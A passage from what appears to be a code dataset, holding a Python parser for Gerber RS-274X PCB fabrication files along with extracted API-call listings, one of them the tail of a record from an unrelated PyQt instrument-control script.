QVisaUnitSelector\n'), ((18291, 18359), 'PyQtVisa.widgets.QVisaUnitSelector.QVisaUnitSelector', 'QVisaUnitSelector.QVisaUnitSelector', (['self.current_sweep_delay_config'], {}), '(self.current_sweep_delay_config)\n', (18326, 18359), False, 'from PyQtVisa.widgets import QVisaUnitSelector\n'), ((18946, 18955), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\n', (18953, 18955), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((18985, 18998), 'PyQt5.QtWidgets.QVBoxLayout', 'QVBoxLayout', ([], {}), '()\n', (18996, 18998), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((19239, 19306), 'PyQtVisa.widgets.QVisaUnitSelector.QVisaUnitSelector', 'QVisaUnitSelector.QVisaUnitSelector', (['self.voltage_step_start_config'], {}), '(self.voltage_step_start_config)\n', (19274, 19306), False, 'from PyQtVisa.widgets import QVisaUnitSelector\n'), ((19543, 19609), 'PyQtVisa.widgets.QVisaUnitSelector.QVisaUnitSelector', 'QVisaUnitSelector.QVisaUnitSelector', (['self.voltage_step_stop_config'], {}), '(self.voltage_step_stop_config)\n', (19578, 19609), False, 'from PyQtVisa.widgets import QVisaUnitSelector\n'), ((19864, 19930), 'PyQtVisa.widgets.QVisaUnitSelector.QVisaUnitSelector', 'QVisaUnitSelector.QVisaUnitSelector', (['self.voltage_step_cmpl_config'], {}), '(self.voltage_step_cmpl_config)\n', (19899, 19930), False, 'from PyQtVisa.widgets import QVisaUnitSelector\n'), ((20146, 20212), 'PyQtVisa.widgets.QVisaUnitSelector.QVisaUnitSelector', 'QVisaUnitSelector.QVisaUnitSelector', (['self.voltage_step_npts_config'], {}), '(self.voltage_step_npts_config)\n', (20181, 20212), False, 'from PyQtVisa.widgets import QVisaUnitSelector\n'), ((20721, 20730), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\n', (20728, 20730), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((20760, 20773), 'PyQt5.QtWidgets.QVBoxLayout', 'QVBoxLayout', ([], {}), '()\n', (20771, 20773), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((21014, 21081), 'PyQtVisa.widgets.QVisaUnitSelector.QVisaUnitSelector', 'QVisaUnitSelector.QVisaUnitSelector', (['self.current_step_start_config'], {}), '(self.current_step_start_config)\n', (21049, 21081), False, 'from PyQtVisa.widgets import QVisaUnitSelector\n'), ((21318, 21384), 'PyQtVisa.widgets.QVisaUnitSelector.QVisaUnitSelector', 'QVisaUnitSelector.QVisaUnitSelector', (['self.current_step_stop_config'], {}), '(self.current_step_stop_config)\n', (21353, 21384), False, 'from PyQtVisa.widgets import QVisaUnitSelector\n'), ((21638, 21704), 'PyQtVisa.widgets.QVisaUnitSelector.QVisaUnitSelector', 'QVisaUnitSelector.QVisaUnitSelector', (['self.current_step_cmpl_config'], {}), '(self.current_step_cmpl_config)\n', (21673, 21704), False, 'from PyQtVisa.widgets import QVisaUnitSelector\n'), ((21919, 21985), 'PyQtVisa.widgets.QVisaUnitSelector.QVisaUnitSelector', 'QVisaUnitSelector.QVisaUnitSelector', (['self.current_step_npts_config'], {}), '(self.current_step_npts_config)\n', (21954, 21985), False, 'from PyQtVisa.widgets import QVisaUnitSelector\n'), ((22554, 22593), 'PyQtVisa.widgets.QVisaDynamicPlot.QVisaDynamicPlot', 'QVisaDynamicPlot.QVisaDynamicPlot', (['self'], {}), '(self)\n', (22587, 22593), False, 'from PyQtVisa.widgets import QVisaDynamicPlot\n'), ((30091, 30102), 'time.time', 'time.time', ([], {}), '()\n', (30100, 30102), False, 'import time\n'), ((36810, 36821), 'time.time', 'time.time', ([], {}), '()\n', (36819, 36821), False, 'import time\n'), ((3549, 3581), 'numpy.concatenate', 'np.concatenate', (['(sp, sp[-2::-1])'], {}), '((sp, sp[-2::-1]))\n', (3563, 3581), True, 'import numpy as np\n'), ((3846, 3874), 'numpy.where', 'np.where', (['(sp > 0)', 'sp', 'np.nan'], {}), '(sp > 0, sp, np.nan)\n', (3854, 3874), True, 'import numpy as np\n'), ((3944, 3972), 'numpy.where', 'np.where', (['(sp < 0)', 'sp', 'np.nan'], {}), '(sp < 0, sp, np.nan)\n', (3952, 3972), True, 'import numpy as np\n'), ((28147, 28160), 'PyQt5.QtWidgets.QMessageBox', 'QMessageBox', ([], {}), '()\n', (28158, 28160), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((4159, 4234), 'numpy.concatenate', 'np.concatenate', (['([0.0], pos, pos[-2::-1], [0.0], neg[::-1], neg[1:], [0.0])'], {}), '(([0.0], pos, pos[-2::-1], [0.0], neg[::-1], neg[1:], [0.0]))\n', (4173, 4234), True, 'import numpy as np\n'), ((28645, 28658), 'PyQt5.QtWidgets.QMessageBox', 'QMessageBox', ([], {}), '()\n', (28656, 28658), False, 'from PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout, QHBoxLayout, QMessageBox, QComboBox, QSpinBox, QDoubleSpinBox, QPushButton, QCheckBox, QLabel, QLineEdit, QStackedWidget, QSizePolicy\n'), ((40793, 40854), 'threading.Thread', 'threading.Thread', ([], {'target': 'self.exec_sweep_step_thread', 'args': '()'}), '(target=self.exec_sweep_step_thread, args=())\n', (40809, 40854), False, 'import threading\n'), ((40884, 40940), 'threading.Thread', 'threading.Thread', ([], {'target': 'self.exec_sweep_thread', 'args': '()'}), '(target=self.exec_sweep_thread, args=())\n', (40900, 40940), False, 'import threading\n'), ((3891, 3904), 'numpy.isnan', 'np.isnan', (['pos'], {}), '(pos)\n', (3899, 3904), True, 'import numpy as np\n'), ((3988, 4001), 'numpy.isnan', 'np.isnan', (['neg'], {}), '(neg)\n', (3996, 4001), True, 'import numpy as np\n'), ((4342, 4417), 'numpy.concatenate', 'np.concatenate', (['([0.0], neg, neg[-2::-1], [0.0], pos[::-1], pos[1:], [0.0])'], {}), '(([0.0], neg, neg[-2::-1], [0.0], pos[::-1], pos[1:], [0.0]))\n', (4356, 4417), True, 'import numpy as np\n'), ((4519, 4551), 'numpy.concatenate', 'np.concatenate', (['(sp, sp[-2::-1])'], {}), '((sp, sp[-2::-1]))\n', (4533, 4551), True, 'import numpy as np\n'), ((32926, 32953), 'time.sleep', 'time.sleep', (['__sweep_delay__'], {}), '(__sweep_delay__)\n', (32936, 32953), False, 'import time\n'), ((38230, 38257), 'time.sleep', 'time.sleep', (['__sweep_delay__'], {}), '(__sweep_delay__)\n', (38240, 38257), False, 'import time\n'), ((4996, 5022), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (5012, 5022), False, 'import os\n'), ((38307, 38318), 'time.time', 'time.time', ([], {}), '()\n', (38316, 38318), False, 'import time\n'), ((33985, 34012), 'time.sleep', 'time.sleep', (['__sweep_delay__'], {}), '(__sweep_delay__)\n', (33995, 34012), False, 'import time\n'), ((34066, 34077), 'time.time', 'time.time', ([], {}), '()\n', (34075, 34077), False, 'import time\n')] |
#!/usr/bin/python3
# RS-274X per standard Revision 2021.02
import re
import copy
import numpy as np
import vertices
# TODO replace all vertices with outline class
# Meant for extracting substrings only
# Cast to int or float will catch invalid strings
RE_INT = r'[+-]?[0-9]+'
RE_DEC = r'[+-]?[0-9\.]+?'
EXPOSURE_ON = 1
EXPOSURE_OFF = 0
class Gerber():
def __init__(self):
self.format_num_int = None
self.format_num_dec = None
self.unit = None
self.current_point = None
self.current_aperture = None
# Interpolation should be None, but not all files have G01
self.interpolation = 'linear'
self.region = None
self.transform = ApertureTransform()
self.apertures = {}
self.templates = {
'C': Circle(1.0),
'R': Rectangle(1.0, 1.0),
'O': Obround(1.0, 1.0),
'P': Polygon(1.0, 3, 0.0)
}
self.objects = []
self.objects_list_stack = [self.objects]
self.reached_eof = False
def add_object(self, new_obj):
self.objects_list_stack[-1].append(new_obj)
def comment(self, statement: str):
pass
def ignore(self, statement: str):
pass
def not_implemented(self, statement: str):
raise NotImplementedError('Command not implemented: ' + statement)
def begin_region(self, statement: str):
# TODO is self.region required?
self.region = Region(self.transform)
self.objects_list_stack.append(self.region)
def end_region(self, statement: str):
self.region.end_contour()
self.objects_list_stack.pop()
self.add_object(self.region)
self.region = None
def get_command_function(self, statement: str):
commands = {
'G04': self.comment,
'MO': self.set_mode,
'FS': self.set_format,
'AD': self.aperture_define,
'AM': self.aperture_macro,
'Dnn': self.set_current_aperture,
'D01': self.interpolate_operation,
'D02': self.move_operation,
'D03': self.flash_operation,
'G01': self.set_interpolation,
'G02': self.set_interpolation,
'G03': self.set_interpolation,
'G74': self.not_implemented,
'G75': self.ignore,
'LP': self.load_polarity,
'LM': self.load_mirroring,
'LR': self.load_rotation,
'LS': self.load_scaling,
'G36': self.begin_region,
'G37': self.end_region,
'AB': self.aperture_block,
'SR': self.step_and_repeat,
'TF': self.ignore,
'TA': self.ignore,
'TO': self.ignore,
'TD': self.ignore,
'M02': self.set_eof
}
# Extended commands
# e.g.
# %MOMM*%
# %AMDonut*
# 1,1,$1,$2,$3*
# $4=$1x0.75*
# 1,0,$4,$2,$3*
# %
# %ADD11Donut,0.30X0X0*%
code = None
if statement.startswith('%'):
code = statement[1:3]
else:
# Word commands
# e.g.
# G04 comment *
# D10*
# X0Y0D02*
match = re.search(r'[GDM](\d\d)', statement)
if match:
code = match.group()
if code[0] == 'D' and int(match.group(1)) >= 10:
code = 'Dnn'
try:
return commands[code]
except KeyError:
raise KeyError(f'Unrecognized statement: {statement}')
def set_eof(self, statement: str):
if statement != 'M02*':
raise ValueError('Invalid EOF statement')
self.reached_eof = True
def parse(self, filename: str):
with open(filename, 'r') as f:
delimiter = False
for line_num, line in enumerate(f):
if line.isspace():
continue
if line.startswith('%'):
delimiter = True
statement = ''
if delimiter:
statement += line
else:
statement = line
if line.endswith('%\n'):
delimiter = False
if not delimiter:
statement = statement.strip()
try:
command = self.get_command_function(statement)
command(statement)
except (ValueError, KeyError) as ex:
raise ValueError(f'Error line {line_num + 1}: {ex}')
if not self.reached_eof:
raise ValueError('File did not contain EOF marker')
def set_mode(self, statement: str):
# Set unit of measurement to metric or imperial
if statement == '%MOMM*%':
self.unit = 'mm'
elif statement == '%MOIN*%':
self.unit = 'in'
else:
raise ValueError(f'Unrecognized mode statement: {statement}')
def set_format(self, statement: str):
# Set coordinates and distances in operations
# %FSLAX36Y36*% sets 3 integer digits, 6 decimal digits
# 6 decimal digits implies 10^-6 is increment
if self.format_num_dec is not None or self.format_num_int is not None:
raise ValueError('Format must be set exactly once')
match = re.search(r'%FSLAX([1-6])([3-6])Y([1-6])([3-6])\*%', statement)
if match is None:
raise ValueError(f'Unrecognized format statement: {statement}')
if match.group(1) != match.group(3):
raise ValueError(f'Mismatched format X, Y integer digits: {statement}')
if match.group(2) != match.group(4):
raise ValueError(f'Mismatched format X, Y decimal digits: {statement}')
self.format_num_int = int(match.group(1))
self.format_num_dec = int(match.group(2))
self.format_scale = 10**(-self.format_num_dec)
def set_interpolation(self, statement: str):
# Set interpolation state to linear or circular
if statement == 'G01*':
self.interpolation = 'linear'
elif statement == 'G02*':
self.interpolation = 'cw_circular'
elif statement == 'G03*':
self.interpolation = 'ccw_circular'
else:
raise ValueError(f'Unrecognized interpolation statement: {statement}')
def create_aperture(self):
if self.current_aperture is not None:
return self.apertures[self.current_aperture].clone()
else:
return None
def get_new_point(self, x: str, y: str):
# Parse strings, e.g. X2152000 and Y1215000
if x and y:
return (int(x[1:]), int(y[1:]))
elif x:
return (int(x[1:]), self.current_point[1])
elif y:
return (self.current_point[0], int(y[1:]))
else:
raise ValueError('Invalid x and y')
def interpolate_operation(self, statement: str):
# D01 linear/circular line segment
match = re.search(rf'(X{RE_INT})?(Y{RE_INT})?(I{RE_INT})?(J{RE_INT})?D01\*', statement)
if match is not None:
x = match.group(1)
y = match.group(2)
i = match.group(3)
j = match.group(4)
new_point = self.get_new_point(x, y)
if self.interpolation == 'linear':
self.add_object(Draw(self.create_aperture(), self.transform,
self.current_point, new_point))
elif self.interpolation in ('cw_circular', 'ccw_circular'):
if i and j:
offset = (int(i[1:]), int(j[1:]))
else:
raise ValueError(f'Missing offset: I {i}, J {j}')
is_cw = (self.interpolation == 'cw_circular')
self.add_object(Arc(self.create_aperture(), self.transform,
self.current_point, new_point,
offset, is_cw))
else:
raise ValueError(f'Invalid interpolation: {self.interpolation}')
self.current_point = new_point
else:
raise ValueError(f'Unrecognized interpolate operation: {statement}')
def move_operation(self, statement: str):
# D02 move operation
match = re.search(rf'(X{RE_INT})?(Y{RE_INT})?D02\*', statement)
if match is not None:
x = match.group(1)
y = match.group(2)
self.current_point = self.get_new_point(x, y)
else:
raise ValueError(f'Unrecognized move operation: {statement}')
def flash_operation(self, statement: str):
# D03 create flash object
match = re.search(rf'(X{RE_INT})?(Y{RE_INT})?D03\*', statement)
if match is not None:
x = match.group(1)
y = match.group(2)
new_point = self.get_new_point(x, y)
aperture = self.create_aperture()
self.add_object(Flash(aperture, self.transform, new_point))
self.current_point = new_point
else:
raise ValueError(f'Unrecognized flash operation: {statement}')
def load_polarity(self, statement: str):
# Polarity is either clear or dark
if statement == '%LPC*%':
self.transform.polarity = 'clear'
elif statement == '%LPD*%':
self.transform.polarity = 'dark'
else:
raise ValueError(f'Unrecognized polarity statement: {statement}')
def load_mirroring(self, statement: str):
# Mirror either N, X, Y or XY
match = re.search(r'%LM(N|X|Y|XY)\*%', statement)
if match is not None:
self.transform.mirroring = match.group(1)
else:
raise ValueError(f'Unrecognized mirroring statement: {statement}')
def load_rotation(self, statement: str):
# Rotation in degrees counterclockwise
match = re.search(r'%LR(\S+)\*%', statement)
if match is not None:
self.transform.rotation = float(match.group(1))
else:
raise ValueError(f'Unrecognized rotation statement: {statement}')
def load_scaling(self, statement: str):
# Scaling where 1.0 is no scaling
match = re.search(r'%LS(\S+)\*%', statement)
if match is not None:
self.transform.scaling = float(match.group(1))
else:
raise ValueError(f'Unrecognized scaling statement: {statement}')
def aperture_define(self, statement: str):
# Parse e.g. %ADD100C,1.5*%
# AD, D100, C, 1.5
# cmd, ident, template
match = re.search(r'%AD(D[0-9]{2,})([\w\.\$]+)(,\S*)?\*%', statement)
if match is not None:
ident = match.group(1)
template_name = match.group(2)
parameters = match.group(3)
if parameters:
parameters = parameters.lstrip(',')
if ident in self.apertures:
raise ValueError(f'Aperture {ident} already defined')
if template_name in self.templates:
self.apertures[ident] = self.templates[template_name].derive_from(parameters)
else:
raise KeyError(f'Aperture template {template_name} not defined')
else:
raise ValueError(f'Unrecognized aperture define statement: {statement}')
def aperture_macro(self, statement: str):
# %AMCIRC*\n1,1,1.5,0,0,0*%
match = re.search(r'%AM([\w\.\$]+)', statement)
if match is not None:
ident = match.group(1)
if ident in self.templates:
raise ValueError(f'Aperture {ident} template already defined')
self.templates[ident] = Macro.parse(statement)
else:
raise ValueError(f'Unrecognized aperture macro statement: {statement}')
def aperture_block(self, statement: str):
# %ABD12*%
# %ADD11C,0.5*%
# D10*
# G01*
# X-2500000Y-1000000D03*
# Y1000000D03*
# %LPC*%
# ...
# G01*
# %AB*%
match = re.search(r'%AB(D[0-9]{2,})?\*%', statement)
if match is not None:
ident = match.group(1)
if ident is None: # Close Block
self.objects_list_stack.pop()
else: # Open new Block
if ident in self.apertures:
raise ValueError(f'Aperture {ident} already defined')
self.apertures[ident] = BlockAperture()
self.objects_list_stack.append(self.apertures[ident])
else:
raise ValueError(f'Unrecognized aperture block statement: {statement}')
def set_current_aperture(self, statement: str):
# D10*
# select aperture D10
match = re.search(r'(D[0-9]{2,})\*', statement)
if match is not None:
ident = match.group(1)
if ident in self.apertures:
self.current_aperture = ident
else:
raise KeyError(f'Aperture {ident} is not defined')
else:
raise ValueError(f'Unrecognized set current aperture statement: {statement}')
def step_and_repeat(self, statement: str):
# %SRX3Y2I5.0J4.0*%
# ...
# %SR*%
# Step and repeat all enclosed statements
if statement == '%SR*%':
self.objects_list_stack.pop()
else:
match = re.search(rf'%SRX(\d+)Y(\d+)I({RE_DEC})J({RE_DEC})\*%', statement)
if match is not None:
x = int(match.group(1))
y = int(match.group(2))
i = float(match.group(3))
j = float(match.group(4))
sr = StepAndRepeat(x, y, i, j)
self.add_object(sr)
self.objects_list_stack.append(sr)
else:
raise ValueError(f'Unrecognized step and repeat statement: {statement}')
class ApertureTransform():
def __init__(self,
polarity: str = 'dark', mirroring: str = 'N',
rotation: float = 0.0, scaling: float = 1.0):
self.polarity = polarity
self.mirroring = mirroring
self.rotation = rotation
self.scaling = scaling
class Aperture():
def __init__(self):
pass
def derive_from(self, statement: str):
if statement is None:
raise ValueError('Missing parameters statement')
tokens = statement.split('X')
return type(self)(*[float(token) for token in tokens])
def clone(self):
new = copy.copy(self)
return new
def get_hole_vertices(self, dest: list = None):
hole_pts = None
if self.hole_diameter:
hole_pts = vertices.circle(self.hole_diameter)
hole_pts = np.flip(hole_pts, 0)
if dest is not None:
dest.append(hole_pts)
return hole_pts
def get_outline(self, dest: list = None):
raise NotImplementedError('get_outline not implemented')
class Circle(Aperture):
def __init__(self, diameter: float, hole_diameter: float = None):
super().__init__()
self.diameter = diameter
self.hole_diameter = hole_diameter
def get_outline(self, dest: list = None):
pts = vertices.circle(self.diameter)
holes = []
self.get_hole_vertices(holes)
outline = vertices.OutlineVertices(pts, holes)
if dest is not None:
dest.append(outline)
return outline
class Rectangle(Aperture):
def __init__(self, x_size: float, y_size: float,
hole_diameter: float = None):
super().__init__()
self.x_size = x_size
self.y_size = y_size
self.hole_diameter = hole_diameter
def get_outline(self, dest: list = None):
pts = vertices.rectangle(self.x_size, self.y_size)
holes = []
self.get_hole_vertices(holes)
outline = vertices.OutlineVertices(pts, holes)
if dest is not None:
dest.append(outline)
return outline
class Obround(Aperture):
def __init__(self, x_size: float, y_size: float,
hole_diameter: float = None):
super().__init__()
self.x_size = x_size
self.y_size = y_size
self.hole_diameter = hole_diameter
def get_outline(self, dest: list = None):
w = min(self.x_size, self.y_size)
z = 0.5 * (max(self.x_size, self.y_size) - w)
if self.x_size > self.y_size:
x1, x2 = -z, z
y1, y2 = 0, 0
else:
x1, x2 = 0, 0
y1, y2 = -z, z
pts = vertices.rounded_line(w, x1, y1, x2, y2)
holes = []
self.get_hole_vertices(holes)
outline = vertices.OutlineVertices(pts, holes)
if dest is not None:
dest.append(outline)
return outline
class Polygon(Aperture):
def __init__(self, outer_diameter: float, vertices: int,
rotation: float = 0.0, hole_diameter: float = None):
super().__init__()
self.outer_diameter = outer_diameter
self.vertices = int(vertices)
self.rotation = rotation
self.hole_diameter = hole_diameter
if self.vertices not in range(3, 13):
raise ValueError('Polygon vertices must be from 3 to 12')
def get_outline(self, dest: list = None):
pts = vertices.regular_poly(self.outer_diameter, self.vertices)
vertices.rotate(pts, self.rotation)
holes = []
self.get_hole_vertices(holes)
outline = vertices.OutlineVertices(pts, holes)
if dest is not None:
dest.append(outline)
return outline
class Macro(Aperture):
def __init__(self, template_str: str, primitives: list):
super().__init__()
self.template_str = template_str
self.primitives = primitives
def get_outline(self, dest: list = None):
outlines = []
for prim in self.primitives:
outlines.append(prim.get_outline(dest))
return outlines
def derive_from(self, statement: str):
# Collect parameter values from creation statement
params = {}
if statement is not None:
for i, token in enumerate(statement.split('X')):
params[i + 1] = float(token)
# Create primitives by parsing template string
primitives = []
blocks = self.template_str.replace('\n', '').split('*')
for block in blocks:
# Ignore open/close block or comment
if block.startswith('%') or block.startswith('0'):
continue
# Resolve new variables
if block.startswith('$'):
expr = re.search(r'\$(\d+)\s*=([^*]+)*', block)
expr_p = expr.group(1)
expr_e = expr.group(2)
for p, v in params.items():
expr_e = expr_e.replace(f'${p}', str(v))
params[expr_p] = Macro.eval_expression(expr_e)
# Attempt to create a primitive
else:
code = block.split(',')[0]
for p, v in params.items():
block = block.replace(f'${p}', str(v))
missing = re.search(r'\$\d+', block)
if missing:
raise KeyError('Unfulfilled macro parameter ' +
missing.group())
try:
primitives.append(Macro.primtypes(code).parse(block))
except KeyError:
raise KeyError('Unrecognized macro code ' + str(code))
return type(self)(self.template_str, primitives)
@staticmethod
def primtypes(code):
prims = {
'1': MacroCircle,
'20': MacroVectorLine,
'21': MacroCenterLine,
'4': MacroOutline,
'5': MacroPolygon,
'6': MacroMoire,
'7': MacroThermal
}
return prims[code]
@classmethod
def parse(cls, statement: str):
if not statement.startswith('%AM'):
raise ValueError('Invalid define macro statement')
# TODO validate template
return cls(statement, [])
@staticmethod
def eval_expression(expr: str):
legal = set('0123456789()-+/x.')
chars = set(expr)
illegal = chars.difference(legal)
if len(illegal) > 0:
raise ValueError('Illegal characters in expression: ' + expr)
expr = expr.replace('x', '*') # Multiplication
return eval(expr)
class MacroPrimitive():
def __init__(self, exposure, x, y, rotation):
if exposure not in (EXPOSURE_OFF, EXPOSURE_ON):
raise ValueError('Invalid exposure value')
self.exposure = exposure
self.x = x
self.y = y
self.rotation = rotation
def get_outline(self, dest: list = None):
raise NotImplementedError('get_vertices not implemented')
@classmethod
def parse(cls, statement: str):
if statement is None:
raise ValueError('Missing parameters statement')
tokens = statement.split(',')[1:] # Discard first token (shape code)
return cls(*[Macro.eval_expression(token) for token in tokens])
class MacroCircle(MacroPrimitive):
def __init__(self, exposure, diameter, x, y, rotation=0.0):
super().__init__(exposure, x, y, rotation)
self.diameter = diameter
def get_outline(self, dest: list = None):
pts = vertices.circle(self.diameter)
outline = vertices.OutlineVertices(pts)
outline.positive = self.exposure == 1
outline.translate(self.x, self.y)
outline.rotate(self.rotation)
if dest is not None:
dest.append(outline)
return outline
class MacroVectorLine(MacroPrimitive):
def __init__(self, exposure, width, x1, y1, x2, y2, rotation=0.0):
super().__init__(exposure, 0, 0, rotation)
self.width = width
self.x1 = x1
self.y1 = y1
self.x2 = x2
self.y2 = y2
def get_outline(self, dest: list = None):
pts = vertices.thick_line(self.width,
self.x1, self.y1,
self.x2, self.y2)
outline = vertices.OutlineVertices(pts)
outline.positive = self.exposure == 1
outline.translate(self.x, self.y)
outline.rotate(self.rotation)
if dest is not None:
dest.append(outline)
return outline
class MacroCenterLine(MacroPrimitive):
def __init__(self, exposure, width, height, x, y, rotation=0.0):
super().__init__(exposure, x, y, rotation)
self.width = width
self.height = height
def get_outline(self, dest: list = None):
pts = vertices.rectangle(self.width, self.height)
outline = vertices.OutlineVertices(pts)
outline.positive = self.exposure == 1
outline.translate(self.x, self.y)
outline.rotate(self.rotation)
if dest is not None:
dest.append(outline)
return outline
class MacroPolygon(MacroPrimitive):
def __init__(self, exposure, vertices, x, y, diameter, rotation=0.0):
super().__init__(exposure, x, y, rotation)
self.vertices = vertices
self.diameter = diameter
def get_outline(self, dest: list = None):
pts = vertices.regular_poly(self.diameter, self.vertices)
outline = vertices.OutlineVertices(pts)
outline.positive = self.exposure == 1
outline.translate(self.x, self.y)
outline.rotate(self.rotation)
if dest is not None:
dest.append(outline)
return outline
class MacroThermal(MacroPrimitive):
def __init__(self, x, y, outer_diameter, inner_diameter,
gap, rotation=0.0):
super().__init__(EXPOSURE_ON, x, y, rotation)
self.outer_diameter = outer_diameter
self.inner_diameter = inner_diameter
self.gap = gap
def get_outline(self, dest: list = None):
pts = vertices.circle(self.outer_diameter)
hole_pts = vertices.circle(self.inner_diameter)
holes = [np.flip(hole_pts, 0)]
# TODO add gaps
outline = vertices.OutlineVertices(pts, holes)
outline.positive = self.exposure == 1
outline.translate(self.x, self.y)
outline.rotate(self.rotation)
if dest is not None:
dest.append(outline)
return outline
class MacroMoire(MacroPrimitive):
def __init__(self, x, y, outer_diameter, ring_thickness,
gap, num_rings, crosshair_thickness, crosshair_length,
rotation=0.0):
super().__init__(EXPOSURE_ON, x, y, rotation)
self.outer_diameter = outer_diameter
self.ring_thickness = ring_thickness
self.gap = gap
self.num_rings = num_rings
self.crosshair_thickness = crosshair_thickness
self.crosshair_length = crosshair_length
def get_outline(self, dest: list = None):
pts = vertices.circle(self.outer_diameter)
holes = [vertices.circle(self.inner_diameter)]
# TODO implement properly
outline = vertices.OutlineVertices(pts, holes)
outline.positive = self.exposure == 1
outline.translate(self.x, self.y)
outline.rotate(self.rotation)
if dest is not None:
dest.append(outline)
return outline
class MacroOutline(MacroPrimitive):
def __init__(self, exposure, vertices, x, y, *args):
N = 2 * vertices + 1
if len(args) == N:
super().__init__(exposure, x, y, rotation=float(args[-1]))
self.vertices = vertices
self.coordinates = [*args[:-1]]
else:
raise ValueError(f'Expected {N} parameters but received {len(args)}')
def get_outline(self, dest: list = None):
N = int(len(self.coordinates) / 2)
pts = np.array(self.coordinates)
pts.resize((N, 2))
outline = vertices.OutlineVertices(pts)
outline.positive = self.exposure == 1
outline.rotate(self.rotation)
if dest is not None:
dest.append(outline)
return outline
class BlockAperture(Aperture):
def __init__(self):
super().__init__()
self.objects = []
def append(self, object):
self.objects.append(object)
class GraphicalObject():
def __init__(self, aperture, transform, origin: tuple):
self.aperture = aperture
self.transform = copy.copy(transform)
self.origin = origin
def translate(self, translation):
dx, dy = translation
x0, y0 = self.origin
self.origin = (x0 + dx, y0 + dy)
def get_outline(self, dest: list = None, scale: float = 1e-6):
raise NotImplementedError('get_outline not implemented')
class Draw(GraphicalObject):
def __init__(self, aperture, transform, origin: tuple, endpoint: tuple):
super().__init__(aperture, transform, origin)
self.endpoint = endpoint
def translate(self, translation):
dx, dy = translation
x0, y0 = self.origin
x1, y1 = self.endpoint
self.origin = (x0 + dx, y0 + dy)
self.endpoint = (x1 + dx, y1 + dy)
def get_outline(self, dest: list = None, scale: float = 1e-6):
x0, y0 = scale * np.array(self.origin)
x1, y1 = scale * np.array(self.endpoint)
pts = vertices.rounded_line(self.aperture.diameter, x0, y0, x1, y1)
outline = vertices.OutlineVertices(pts)
# TODO apply transform
if dest is not None:
dest.append(outline)
return outline
# TODO Arc needs quadrant mode
class Arc(GraphicalObject):
def __init__(self, aperture, transform, origin: tuple, endpoint: tuple,
offset: tuple, is_cw: bool = True):
super().__init__(aperture, transform, origin)
self.endpoint = endpoint
self.offset = offset
self.is_cw = is_cw
def translate(self, translation):
dx, dy = translation
x0, y0 = self.origin
x1, y1 = self.endpoint
self.origin = (x0 + dx, y0 + dy)
self.endpoint = (x1 + dx, y1 + dy)
def get_outline(self, dest: list = None, scale: float = 1e-6):
dx, dy = scale * np.array(self.offset)
x1, y1 = scale * np.array(self.origin)
x2, y2 = scale * np.array(self.endpoint)
x0, y0 = x1 + dx, y1 + dy
pts = vertices.rounded_arc(self.aperture.diameter, x0, y0, x1, y1, x2, y2)
vertices.translate(pts, x0, y0)
outline = vertices.OutlineVertices(pts)
# TODO apply transform
if dest is not None:
dest.append(outline)
return outline
class Flash(GraphicalObject):
def __init__(self, aperture, transform, origin: tuple):
super().__init__(aperture, transform, origin)
def get_outline(self, dest: list = None, scale: float = 1e-6):
outlines = self.aperture.get_outline(dest)
if type(outlines) != list:
outlines = [outlines]
x0, y0 = scale * np.array(self.origin)
# TODO replace with apply transform function
for outline in outlines:
outline.positive = self.transform.polarity == 'dark'
outline.rotate(self.transform.rotation)
outline.translate(x0, y0)
return outlines
class Region(GraphicalObject):
def __init__(self, transform):
super().__init__(None, transform, None)
self.objects = []
self.contours = []
def end_contour(self):
if len(self.contours) > 0:
prev_start, prev_len = self.contours[-1]
new_start = prev_start + prev_len
self.contours.append((new_start, len(self.objects) - new_start))
else:
self.contours.append((0, len(self.objects)))
def append(self, object):
if not isinstance(object, (Draw, Arc)):
raise TypeError('Region only supports Draw and Arc objects')
if len(self.objects) > 0 and object.origin != self.objects[-1].endpoint:
self.end_contour()
self.objects.append(object)
class StepAndRepeat():
def __init__(self, nx: int, ny: int, step_x: float, step_y: float):
if nx < 1 or ny < 1:
raise ValueError('Repeat must be 1 or greater')
if step_x < 0.0 or step_y < 0.0:
raise ValueError('Step size must be positive')
self.nx = nx
self.ny = ny
self.step_x = step_x
self.step_y = step_y
self.objects = []
def append(self, object):
self.objects.append(object)
| [
"vertices.rotate",
"numpy.flip",
"vertices.rounded_arc",
"vertices.thick_line",
"vertices.translate",
"vertices.regular_poly",
"vertices.rounded_line",
"vertices.OutlineVertices",
"vertices.circle",
"numpy.array",
"vertices.rectangle",
"copy.copy",
"re.search"
